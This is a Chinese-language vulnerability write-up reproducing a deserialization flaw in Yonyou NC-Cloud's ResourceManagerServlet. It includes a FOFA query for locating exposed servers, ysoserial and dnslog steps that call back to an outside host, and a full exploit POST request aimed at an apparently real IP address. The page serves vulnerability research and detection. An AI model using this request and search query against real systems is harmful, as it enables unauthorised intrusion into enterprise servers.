登录 白背景

用友NC-Cloud uap-framework-rc-controller存在反序列化漏洞

一、漏洞简介

用友NC Cloud是用友推出的大型企业数字化平台。用友NC-Cloud uap-framework-rc-controller存在反序列化漏洞

二、影响版本

  • 用友NC-Cloud

三、资产测绘

  • fofaapp="用友-NC-Cloud"
  • 登录页面

image.png

四、漏洞复现

  1. 使用yakit生成dnslog域名

image.png

krdzg4.dnslog.cn
  1. 使用yso生成利用链

image.png

  1. 将上一步生成的hex数据替换payload字段,探测是否存在漏洞
POST /servlet/~uapss/uap.framework.rc.controller.ResourceManagerServlet HTTP/1.1
Host: 106.53.230.252:8081
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 335
Accept-Encoding: gzip, deflate
Connection: close
SL-CE-SUID: 126
X-Forwarded-For: 127.0.0.10
X-Originating-IP: 127.0.0.10
X-Remote-Addr: 127.0.0.10
X-Remote-IP: 127.0.0.10

{{hexd(payload)}}

image.png

  1. 若dnslog收到回显表示存在漏洞

image.png
nuclei脚本
用友-nc-cloud-ResourceManagerServlet-反序列化.yaml

原文: https://www.yuque.com/xiaokp7/ocvun2/okfszpg29qnqh5nf